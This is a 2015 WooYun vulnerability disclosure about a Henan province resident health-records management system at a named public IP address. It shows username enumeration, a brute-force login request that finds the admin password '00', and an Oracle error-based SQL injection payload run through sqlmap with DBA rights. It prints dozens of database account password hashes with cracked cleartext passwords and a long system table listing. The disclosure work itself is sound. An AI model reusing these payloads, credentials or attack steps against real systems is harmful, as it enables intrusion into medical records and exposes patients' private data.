当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137966

漏洞标题:河南省居民健康档案信息管理系统存在弱口令与SQL注入漏洞

相关厂商:河南省居民健康档案信息管理系统

漏洞作者: 路人甲

提交时间:2015-09-04 10:36

修复时间:2015-10-22 08:30

公开时间:2015-10-22 08:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-04: 细节已通知厂商并且等待厂商处理中
2015-09-07: 厂商已经确认,细节仅向厂商公开
2015-09-17: 细节向核心白帽子及相关领域专家公开
2015-09-27: 细节向普通白帽子公开
2015-10-07: 细节向实习白帽子公开
2015-10-22: 细节向公众公开

简要描述:

一个弱口令引起

详细说明:

0x01:管理端口对外

管理窗口对外.png


http://61.163.182.31:7001/commons/main/mainframe.html


没有什么发现,然后看了一下端口,看到一些有意思的端口
0x02:基层医疗系统突破

http://61.163.182.31:80


http://61.163.182.31/His/Login.htm

自识别username.png


然后输入admin,直接提示是超管2,当输入root时,会提示用户名错误,默念这个设计太叼了
0x03:爆破,弱口令

POST /His/LoginSubmit.htm HTTP/1.1
Host: 61.163.182.31
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://61.163.182.31/His/Login.htm?returnUrl=%2FHis%2FIndex.do
Cookie: JSESSIONID=vv32VvySxGJnFlfHN1p3sG7f736pTGqTLFB0xBCGvsnBj4Gnw1pg!1124919323
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
maskIp=&userName=admin&Name=%E8%B6%85%E7%AE%A12&password=§aaaaa§&returnUrl=%2FHis%2FIndex.do


得到密码是00
0x04:进入系统,可以看到大量信息,但是虽然是超级管理员,但是权限还是有些限制,不过系统存在大量的查询操作,想想,可能有注入把

系统功能.png


某菜单功能.png


城市信息.png


...等等,还有一些功能,修改药品信息,添加药品等,不展示了
0x05:注入,Oracle,DBA权限
抓到一些操作的数据包,发现注入
ceshi.txt

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: officeKindNot (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: officeKindNot=10) AND 5674=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5674=5674) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(98)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND (1399=1399
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
current user is DBA: True
sqlmap resumed the following injection point(s) from stored session:
---


#1、表信息

---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
available databases [21]:
[*] BSHIS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PLATFORM_YLPT
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] YLPT
[*] YLPT_BSHIS
[*] YLPT_DC
[*] YYGH


#2、大量密码

database management system users password hashes:
[*] _NEXT_USER [1]:
password hash: NULL
[*] ANONYMOUS [1]:
password hash: anonymous
[*] AQ_ADMINISTRATOR_ROLE [1]:
password hash: NULL
[*] AQ_USER_ROLE [1]:
password hash: NULL
[*] AUTHENTICATEDUSER [1]:
password hash: NULL
[*] BSHIS [1]:
password hash: 17BC879AE174221F
clear-text password: BSHIS
[*] CONNECT [1]:
password hash: NULL
[*] CTXAPP [1]:
password hash: NULL
[*] CTXSYS [1]:
password hash: 71E687F036AD56E5
clear-text password: CHANGE_ON_INSTALL
[*] CWM_USER [1]:
password hash: NULL
[*] DBA [1]:
password hash: NULL
[*] DBSNMP [1]:
password hash: E066D214D5421CCC
clear-text password: DBSNMP
[*] DELETE_CATALOG_ROLE [1]:
password hash: NULL
[*] DIP [1]:
password hash: CE4A36B8E06CA59C
clear-text password: DIP
[*] DMSYS [1]:
password hash: BFBA5A553FD9E28A
clear-text password: DMSYS
[*] EJBCLIENT [1]:
password hash: NULL
[*] EXECUTE_CATALOG_ROLE [1]:
password hash: NULL
[*] EXFSYS [1]:
password hash: 66F4EF5650C20355
clear-text password: EXFSYS
[*] EXP_FULL_DATABASE [1]:
password hash: NULL
[*] GATHER_SYSTEM_STATISTICS [1]:
password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
password hash: GLOBAL
[*] HS_ADMIN_ROLE [1]:
password hash: NULL
[*] IMP_FULL_DATABASE [1]:
password hash: NULL
[*] JAVA_ADMIN [1]:
password hash: NULL
[*] JAVA_DEPLOY [1]:
password hash: NULL
[*] JAVADEBUGPRIV [1]:
password hash: NULL
[*] JAVAIDPRIV [1]:
password hash: NULL
[*] JAVASYSPRIV [1]:
password hash: NULL
[*] JAVAUSERPRIV [1]:
password hash: NULL
[*] LOGSTDBY_ADMINISTRATOR [1]:
password hash: NULL
[*] MDDATA [1]:
password hash: DF02A496267DEE66
clear-text password: MDDATA
[*] MDSYS [1]:
password hash: 72979A94BAD2AF80
clear-text password: MDSYS
[*] MGMT_USER [1]:
password hash: NULL
[*] MGMT_VIEW [1]:
password hash: 2DA6A02DB4DA34C8
[*] OEM_ADVISOR [1]:
password hash: NULL
[*] OEM_MONITOR [1]:
password hash: NULL
[*] OLAP_DBA [1]:
password hash: NULL
[*] OLAP_USER [1]:
password hash: NULL
[*] OLAPI_TRACE_USER [1]:
password hash: NULL
[*] OLAPSYS [1]:
password hash: 4AC23CC3B15E2208
[*] ORACLE_OCM [1]:
password hash: 5A2E026A9157958C
[*] ORDPLUGINS [1]:
password hash: 88A2B2C183431F00
clear-text password: ORDPLUGINS
[*] ORDSYS [1]:
password hash: 7EFA02EC7EA6B86F
clear-text password: ORDSYS
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
clear-text password: OUTLN
[*] PLATFORM_YLPT [1]:
password hash: D0F22043E9573328
clear-text password: PLATFORM_YLPT
[*] PUBLIC [1]:
password hash: NULL
[*] RECOVERY_CATALOG_OWNER [1]:
password hash: NULL
[*] RESOURCE [1]:
password hash: NULL
[*] SCHEDULER_ADMIN [1]:
password hash: NULL
[*] SCOTT [1]:
password hash: F894844C34402B67
clear-text password: TIGER
[*] SELECT_CATALOG_ROLE [1]:
password hash: NULL
[*] SI_INFORMTN_SCHEMA [1]:
password hash: 84B8CBCA4D477FA3
clear-text password: SI_INFORMTN_SCHEMA
[*] SYS [1]:
password hash: 2C185D9F5E501FEC
[*] SYSMAN [1]:
password hash: 447B729161192C24
clear-text password: SYSMAN
[*] SYSTEM [1]:
password hash: 7901A72C29DEE20C
[*] TSMSYS [1]:
password hash: 3DF26A8B17D0F29F
clear-text password: TSMSYS
[*] WM_ADMIN_ROLE [1]:
password hash: NULL
[*] WMSYS [1]:
password hash: 7C9BA362F8314299
clear-text password: WMSYS
[*] XDB [1]:
password hash: 88D8364765FCE6AF
clear-text password: CHANGE_ON_INSTALL
[*] XDBADMIN [1]:
password hash: NULL
[*] XDBWEBSERVICES [1]:
password hash: NULL
[*] YLPT [1]:
password hash: 0D550B302D6C4B38
clear-text password: YLPT
[*] YLPT_BSHIS [1]:
password hash: CD403560DD29CC1D
clear-text password: YLPT_BSHIS
[*] YLPT_DC [1]:
password hash: 3446F9C3472B6536
clear-text password: YLPT_DC
[*] YYGH [1]:
password hash: E4BD60D5FFFDE1D1
clear-text password: YYGH


#3、其中一个表内容(SYS)

Database: SYS
[533 tables]
+--------------------------------+
| DUAL |
| ACCESS$ |
| ALERT_QT |
| APPLY$_CONF_HDLR_COLUMNS |
| APPLY$_CONSTRAINT_COLUMNS |
| APPLY$_DEST_OBJ |
| APPLY$_DEST_OBJ_CMAP |
| APPLY$_DEST_OBJ_OPS |
| APPLY$_ERROR |
| APPLY$_ERROR_HANDLER |
| APPLY$_ERROR_TXN |
| APPLY$_SOURCE_OBJ |
| APPLY$_SOURCE_SCHEMA |
| APPLY$_VIRTUAL_OBJ_CONS |
| APPROLE$ |
| AQ$_ALERT_QT_S |
| AQ$_AQ$_MEM_MC_S |
| AQ$_KUPC$DATAPUMP_QUETAB_S |
| AQ$_MEM_MC |
| AQ$_MESSAGE_TYPES |
| AQ$_PENDING_MESSAGES |
| AQ$_PROPAGATION_STATUS |
| AQ$_PUBLISHER |
| AQ$_QUEUE_STATISTICS |
| AQ$_QUEUE_TABLE_AFFINITIES |
| AQ$_REPLAY_INFO |
| AQ$_SCHEDULER$_EVENT_QTAB_S |
| AQ$_SCHEDULER$_JOBQTAB_S |
| AQ$_SCHEDULES |
| AQ_EVENT_TABLE |
| AQ_SRVNTFN_TABLE |
| ARGUMENT$ |
| ASSOCIATION$ |
| ATTRCOL$ |
| ATTRIBUTE$ |
| ATTRIBUTE_TRANSFORMATIONS$ |
| AUD$ |
| AUDIT$ |
| AUDIT_ACTIONS |
| AUX_STATS$ |
| AW$ |
| AW_OBJ$ |
| AW_PROP$ |
| BOOTSTRAP$ |
| CACHE_STATS_0$ |
| CACHE_STATS_1$ |
| CCOL$ |
| CDC_CHANGE_COLUMNS$ |
| CDC_CHANGE_SETS$ |
| CDC_CHANGE_SOURCES$ |
| CDC_CHANGE_TABLES$ |
| CDC_PROPAGATED_SETS$ |
| CDC_PROPAGATIONS$ |
| CDC_SUBSCRIBED_COLUMNS$ |
| CDC_SUBSCRIBED_TABLES$ |
| CDC_SUBSCRIBERS$ |
| CDC_SYSTEM$ |
| CDEF$ |
| CLU$ |
| COL$ |
| COLLECTION$ |
| COLTYPE$ |
| COL_USAGE$ |
| COM$ |
| CON$ |
| CONTEXT$ |
| DBMS_ALERT_INFO |
| DBMS_LOCK_ALLOCATED |
| DEFROLE$ |
| DEFSUBPART$ |
| DEFSUBPARTLOB$ |
| DEPENDENCY$ |
| DIM$ |
| DIMATTR$ |
| DIMJOINKEY$ |
| DIMLEVEL$ |
| DIMLEVELKEY$ |
| DIR$ |
| DIR$ALERT_HISTORY |
| DIR$DATABASE_ATTRIBUTES |
| DIR$ESCALATE_OPERATIONS |
| DIR$INSTANCE_ACTIONS |
| DIR$MIGRATE_OPERATIONS |
| DIR$NODE_ATTRIBUTES |
| DIR$QUIESCE_OPERATIONS |
| DIR$REASON_STRINGS |
| DIR$RESONATE_OPERATIONS |
| DIR$SERVICE_ATTRIBUTES |
| DIR$SERVICE_OPERATIONS |
| DIR$VICTIM_POLICY |
| DUC$ |
| ENC$ |
| ERROR$ |
| EXPACT$ |
| EXPDEPACT$ |
| EXPDEPOBJ$ |
| EXPIMP_TTS_CT$ |
| EXPPKGACT$ |
| EXPPKGOBJ$ |
| EXTERNAL_LOCATION$ |
| EXTERNAL_TAB$ |
| FET$ |
| FGA$ |
| FGACOL$ |
| FGA_LOG$ |
| FGR$_FILE_GROUPS |
| FGR$_FILE_GROUP_EXPORT_INFO |
| FGR$_FILE_GROUP_FILES |
| FGR$_FILE_GROUP_VERSIONS |
| FGR$_TABLESPACE_INFO |
| FGR$_TABLE_INFO |
| FILE$ |
| FIXED_OBJ$ |
| HIER$ |
| HIERLEVEL$ |
| HISTGRM$ |
| HIST_HEAD$ |
| HS$_BASE_CAPS |
| HS$_BASE_DD |
| HS$_CLASS_CAPS |
| HS$_CLASS_DD |
| HS$_CLASS_INIT |
| HS$_FDS_CLASS |
| HS$_FDS_CLASS_DATE |
| HS$_FDS_INST |
| HS$_INST_CAPS |
| HS$_INST_DD |
| HS$_INST_INIT |
| ICOL$ |
| ICOLDEP$ |
| IDL_CHAR$ |
| IDL_SB4$ |
| IDL_UB1$ |
| IDL_UB2$ |
| ID_GENS$ |
| INCEXP |
| INCFIL |
| INCVID |
| IND$ |
| INDARRAYTYPE$ |
| INDCOMPART$ |
| INDOP$ |
| INDPART$ |
| INDPART_PARAM$ |
| INDSUBPART$ |
| INDTYPES$ |
| IND_ONLINE$ |
| IND_STATS$ |
| INVALIDATION_REGISTRY$ |
| JAVAOBJ$ |
| JAVASNM$ |
| JIJOIN$ |
| JIREFRESHSQL$ |
| JOB$ |
| KOPM$ |
| KUPC$DATAPUMP_QUETAB |
| KU_NOEXP_TAB |
| LIBRARY$ |
| LINK$ |
| LOB$ |
| LOBCOMPPART$ |
| LOBFRAG$ |
| LOC$ |
| LOG$ |
| LOGMNRG_ATTRCOL$ |
| LOGMNRG_ATTRIBUTE$ |
| LOGMNRG_CCOL$ |
| LOGMNRG_CDEF$ |
| LOGMNRG_COL$ |
| LOGMNRG_COLTYPE$ |
| LOGMNRG_DICTIONARY$ |
| LOGMNRG_ICOL$ |
| LOGMNRG_IND$ |
| LOGMNRG_INDCOMPART$ |
| LOGMNRG_INDPART$ |
| LOGMNRG_INDSUBPART$ |
| LOGMNRG_LOB$ |
| LOGMNRG_LOBFRAG$ |
| LOGMNRG_OBJ$ |
| LOGMNRG_SEED$ |
| LOGMNRG_TAB$ |
| LOGMNRG_TABCOMPART$ |
| LOGMNRG_TABPART$ |
| LOGMNRG_TABSUBPART$ |
| LOGMNRG_TS$ |
| LOGMNRG_TYPE$ |
| LOGMNRG_USER$ |
| LOGMNR_BUILDLOG |
| LOGMNR_INTERESTING_COLS |
| MAP_COMPLIST$ |
| MAP_ELEMENT$ |
| MAP_EXTELEMENT$ |
| MAP_FILE$ |
| MAP_FILE_EXTENT$ |
| MAP_SUBELEMENT$ |
| METAFILTER$ |
| METANAMETRANS$ |
| METAPATHMAP$ |
| METASCRIPT$ |
| METASCRIPTFILTER$ |
| METASTYLESHEET |
| METAVIEW$ |
| METAXSL$ |
| METAXSLPARAM$ |
| METHOD$ |
| MIGRATE$ |
| MLOG$ |
| MLOG_REFCOL$ |
| MON_MODS$ |
| MON_MODS_ALL$ |
| NCOMP_DLL$ |
| NOEXP$ |
| NTAB$ |
| OBJ$ |
| OBJAUTH$ |
| OBJECT_USAGE |
| OBJPRIV$ |
| OID$ |
| OPANCILLARY$ |
| OPARG$ |
| OPBINDING$ |
| OPERATOR$ |
| OPQTYPE$ |
| OPTSTAT_HIST_CONTROL$ |
| PARAMETER$ |
| PARTCOL$ |
| PARTLOB$ |
| PARTOBJ$ |
| PENDING_SESSIONS$ |
| PENDING_SUB_SESSIONS$ |
| PENDING_TRANS$ |
| PROCEDURE$ |
| PROCEDUREC$ |
| PROCEDUREINFO$ |
| PROCEDUREJAVA$ |
| PROCEDUREPLSQL$ |
| PROFILE$ |
| PROFNAME$ |
| PROPS$ |
| PROXY_DATA$ |
| PROXY_INFO$ |
| PROXY_ROLE_DATA$ |
| PROXY_ROLE_INFO$ |
| PS$ |
| RECO_SCRIPT$ |
| RECO_SCRIPT_BLOCK$ |
| RECO_SCRIPT_ERROR$ |
| RECO_SCRIPT_PARAMS$ |
| RECYCLEBIN$ |
| REC_TAB$ |
| REC_VAR$ |
| REDEF$ |
| REDEF_DEP_ERROR$ |
| REDEF_OBJECT$ |
| REFCON$ |
| REG$ |
| REGISTRY$ |
| REGISTRY$DATABASE |
| REGISTRY$HISTORY |
| REGISTRY$LOG |
| REGISTRY$SCHEMAS |
| REG_SNAP$ |
| RESOURCE_CONSUMER_GROUP$ |
| RESOURCE_COST$ |
| RESOURCE_GROUP_MAPPING$ |
| RESOURCE_MAP |
| RESOURCE_MAPPING_PRIORITY$ |
| RESOURCE_PLAN$ |
| RESOURCE_PLAN_DIRECTIVE$ |
| RESULT$ |
| RGCHILD$ |
| RGROUP$ |
| RLS$ |
| RLS_CTX$ |
| RLS_GRP$ |
| RLS_SC$ |
| RULE$ |
| RULESET$ |
| RULE_EC$ |
| RULE_MAP$ |
| RULE_SET$ |
| RULE_SET_EE$ |
| RULE_SET_FOB$ |
| RULE_SET_IEUAC$ |
| RULE_SET_NL$ |
| RULE_SET_RDEP$ |
| RULE_SET_RE$ |
| RULE_SET_ROR$ |
| RULE_SET_TE$ |
| RULE_SET_VE$ |
| SCHEDULER$_CHAIN |
| SCHEDULER$_CLASS |
| SCHEDULER$_EVENT_LOG |
| SCHEDULER$_EVENT_QTAB |
| SCHEDULER$_EVTQ_SUB |
| SCHEDULER$_GLOBAL_ATTRIBUTE |
| SCHEDULER$_JOB |
| SCHEDULER$_JOBQTAB |
| SCHEDULER$_JOB_ARGUMENT |
| SCHEDULER$_JOB_RUN_DETAILS |
| SCHEDULER$_OLDOIDS |
| SCHEDULER$_PROGRAM |
| SCHEDULER$_PROGRAM_ARGUMENT |
| SCHEDULER$_SCHEDULE |
| SCHEDULER$_SRCQ_INFO |
| SCHEDULER$_SRCQ_MAP |
| SCHEDULER$_STEP |
| SCHEDULER$_STEP_STATE |
| SCHEDULER$_WINDOW |
| SCHEDULER$_WINDOW_DETAILS |
| SCHEDULER$_WINDOW_GROUP |
| SCHEDULER$_WINGRP_MEMBER |
| SECOBJ$ |
| SEG$ |
| SEQ$ |
| SERVICE$ |
| SETTINGS$ |
| SLOG$ |
| SMON_SCN_TIME |
| SNAP$ |
| SNAP_COLMAP$ |
| SNAP_LOADERTIME$ |
| SNAP_LOGDEP$ |
| SNAP_OBJCOL$ |
| SNAP_REFOP$ |
| SNAP_REFTIME$ |
| SNAP_SITE$ |
| SOURCE$ |
| SQL$ |
| SQL$TEXT |
| SQLPROF$ |
| SQLPROF$ATTR |
| SQLPROF$DESC |
| SQL_VERSION$ |
| STATS_TARGET$ |
| STMT_AUDIT_OPTION_MAP |
| STREAMS$_APPLY_MILESTONE |
| STREAMS$_APPLY_PROCESS |
| STREAMS$_APPLY_PROGRESS |
| STREAMS$_APPLY_SPILL_MESSAGES |
| STREAMS$_APPLY_SPILL_TXN |
| STREAMS$_APPLY_SPILL_TXN_LIST |
| STREAMS$_CAPTURE_PROCESS |
| STREAMS$_DEF_PROC |
| STREAMS$_DEST_OBJS |
| STREAMS$_DEST_OBJ_COLS |
| STREAMS$_EXTRA_ATTRS |
| STREAMS$_INTERNAL_TRANSFORM |
| STREAMS$_KEY_COLUMNS |
| STREAMS$_MESSAGE_CONSUMERS |
| STREAMS$_MESSAGE_RULES |
| STREAMS$_PREPARE_DDL |
| STREAMS$_PREPARE_OBJECT |
| STREAMS$_PRIVILEGED_USER |
| STREAMS$_PROCESS_PARAMS |
| STREAMS$_PROPAGATION_PROCESS |
| STREAMS$_RULES |
| SUBCOLTYPE$ |
| SUBPARTCOL$ |
| SUM$ |
| SUMAGG$ |
| SUMDELTA$ |
| SUMDEP$ |
| SUMDETAIL$ |
| SUMINLINE$ |
| SUMJOIN$ |
| SUMKEY$ |
| SUMPARTLOG$ |
| SUMPRED$ |
| SUMQB$ |
| SUPEROBJ$ |
| SYN$ |
| SYSAUTH$ |
| SYSTEM_PRIVILEGE_MAP |
| SYS_IOT_OVER_4510 |
| SYS_IOT_OVER_4516 |
| SYS_IOT_OVER_4520 |
| SYS_IOT_OVER_5125 |
| SYS_IOT_OVER_5213 |
| SYS_IOT_OVER_7489 |
| SYS_IOT_OVER_8767 |
| SYS_IOT_OVER_8854 |
| TAB$ |
| TABCOMPART$ |
| TABLE_PRIVILEGE_MAP |
| TABPART$ |
| TABSUBPART$ |
| TAB_STATS$ |
| TRANSFORMATIONS$ |
| TRIGGER$ |
| TRIGGERCOL$ |
| TRIGGERJAVAC$ |
| TRIGGERJAVAF$ |
| TRIGGERJAVAM$ |
| TRIGGERJAVAS$ |
| TRUSTED_LIST$ |
| TS$ |
| TSM_DST$ |
| TSM_SRC$ |
| TSQ$ |
| TYPE$ |
| TYPED_VIEW$ |
| TYPEHIERARCHY$ |
| TYPE_MISC$ |
| UET$ |
| UGROUP$ |
| UNDO$ |
| USER$ |
| USER_ASTATUS_MAP |
| USER_HISTORY$ |
| USTATS$ |
| UTL_RECOMP_ERRORS |
| VIEW$ |
| VIEWCON$ |
| VIEWTRCOL$ |
| VTABLE$ |
| WARNING_SETTINGS$ |
| WRH$_ACTIVE_SESSION_HISTORY_BL |
| WRH$_BG_EVENT_SUMMARY |
| WRH$_BUFFERED_QUEUES |
| WRH$_BUFFERED_SUBSCRIBERS |
| WRH$_BUFFER_POOL_STATISTICS |
| WRH$_COMP_IOSTAT |
| WRH$_CR_BLOCK_SERVER |
| WRH$_CURRENT_BLOCK_SERVER |
| WRH$_DATAFILE |
| WRH$_DB_CACHE_ADVICE_BL |
| WRH$_DLM_MISC_BL |
| WRH$_ENQUEUE_STAT |
| WRH$_EVENT_NAME |
| WRH$_FILEMETRIC_HISTORY |
| WRH$_FILESTATXS_BL |
| WRH$_INSTANCE_RECOVERY |
| WRH$_INST_CACHE_TRANSFER_BL |
| WRH$_JAVA_POOL_ADVICE |
| WRH$_LATCH_BL |
| WRH$_LATCH_CHILDREN_BL |
| WRH$_LATCH_MISSES_SUMMARY_BL |
| WRH$_LATCH_NAME |
| WRH$_LATCH_PARENT_BL |
| WRH$_LIBRARYCACHE |
| WRH$_LOG |
| WRH$_METRIC_NAME |
| WRH$_MTTR_TARGET_ADVICE |
| WRH$_OPTIMIZER_ENV |
| WRH$_OSSTAT_BL |
| WRH$_OSSTAT_NAME |
| WRH$_PARAMETER_BL |
| WRH$_PARAMETER_NAME |
| WRH$_PGASTAT |
| WRH$_PGA_TARGET_ADVICE |
| WRH$_PROCESS_MEMORY_SUMMARY |
| WRH$_RESOURCE_LIMIT |
| WRH$_ROWCACHE_SUMMARY_BL |
| WRH$_SEG_STAT_BL |
| WRH$_SEG_STAT_OBJ |
| WRH$_SERVICE_NAME |
| WRH$_SERVICE_STAT_BL |
| WRH$_SERVICE_WAIT_CLASS_BL |
| WRH$_SESSMETRIC_HISTORY |
| WRH$_SESS_TIME_STATS |
| WRH$_SGA |
| WRH$_SGASTAT_BL |
| WRH$_SGA_TARGET_ADVICE |
| WRH$_SHARED_POOL_ADVICE |
| WRH$_SQLSTAT_BL |
| WRH$_SQLTEXT |
| WRH$_SQL_BIND_METADATA |
| WRH$_SQL_PLAN |
| WRH$_SQL_SUMMARY |
| WRH$_SQL_WORKAREA_HISTOGRAM |
| WRH$_STAT_NAME |
| WRH$_STREAMS_APPLY_SUM |
| WRH$_STREAMS_CAPTURE |
| WRH$_STREAMS_POOL_ADVICE |
| WRH$_SYSMETRIC_HISTORY |
| WRH$_SYSMETRIC_SUMMARY |
| WRH$_SYSSTAT_BL |
| WRH$_SYSTEM_EVENT_BL |
| WRH$_SYS_TIME_MODEL_BL |
| WRH$_TABLESPACE_SPACE_USAGE |
| WRH$_TABLESPACE_STAT_BL |
| WRH$_TEMPFILE |
| WRH$_TEMPSTATXS |
| WRH$_THREAD |
| WRH$_UNDOSTAT |
| WRH$_WAITCLASSMETRIC_HISTORY |
| WRH$_WAITSTAT_BL |
| WRI$_ADV_ACTIONS |
| WRI$_ADV_DEFINITIONS |
| WRI$_ADV_DEF_PARAMETERS |
| WRI$_ADV_DIRECTIVES |
| WRI$_ADV_FINDINGS |
| WRI$_ADV_JOURNAL |
| WRI$_ADV_MESSAGE_GROUPS |
| WRI$_ADV_OBJECTS |
| WRI$_ADV_PARAMETERS |
| WRI$_ADV_RATIONALE |
| WRI$_ADV_RECOMMENDATIONS |
| WRI$_ADV_REC_ACTIONS |
| WRI$_ADV_SQLA_FAKE_REG |
| WRI$_ADV_SQLA_MAP |
| WRI$_ADV_SQLA_STMTS |
| WRI$_ADV_SQLA_TMP |
| WRI$_ADV_SQLW_COLVOL |
| WRI$_ADV_SQLW_STMTS |
| WRI$_ADV_SQLW_SUM |
| WRI$_ADV_SQLW_TABLES |
| WRI$_ADV_SQLW_TABVOL |
| WRI$_ADV_TASKS |
| WRI$_ADV_USAGE |
| WRI$_AGGREGATION_ENABLED |
| WRI$_ALERT_HISTORY |
| WRI$_ALERT_OUTSTANDING |
| WRI$_ALERT_THRESHOLD |
| WRI$_ALERT_THRESHOLD_LOG |
| WRI$_DBU_CPU_USAGE |
| WRI$_DBU_CPU_USAGE_SAMPLE |
| WRI$_DBU_FEATURE_METADATA |
| WRI$_DBU_FEATURE_USAGE |
| WRI$_DBU_HIGH_WATER_MARK |
| WRI$_DBU_HWM_METADATA |
| WRI$_DBU_USAGE_SAMPLE |
| WRI$_OPTSTAT_AUX_HISTORY |
| WRI$_OPTSTAT_HISTGRM_HISTORY |
| WRI$_OPTSTAT_HISTHEAD_HISTORY |
| WRI$_OPTSTAT_IND_HISTORY |
| WRI$_OPTSTAT_OPR |
| WRI$_OPTSTAT_TAB_HISTORY |
| WRI$_SEGADV_CNTRLTAB |
| WRI$_SEGADV_OBJLIST |
| WRI$_TRACING_ENABLED |
| _DEFAULT_AUDITING_OPTIONS_ |
+--------------------------------+


#4、直接执行sql命令

sql执行.png


#5、表很多,没跑完

很多表.png

漏洞证明:

城市信息.png


存在注入.png


SYSTEM表.png

修复方案:

登录窗口不要对外
把系统登录的时候自动识别用户名的功能去掉
能过滤的都过滤一下?

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-07 08:28

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给河南分中心,由其后续协调网站管理单位处置。按多个风险点评分,rank 15

最新状态:

暂无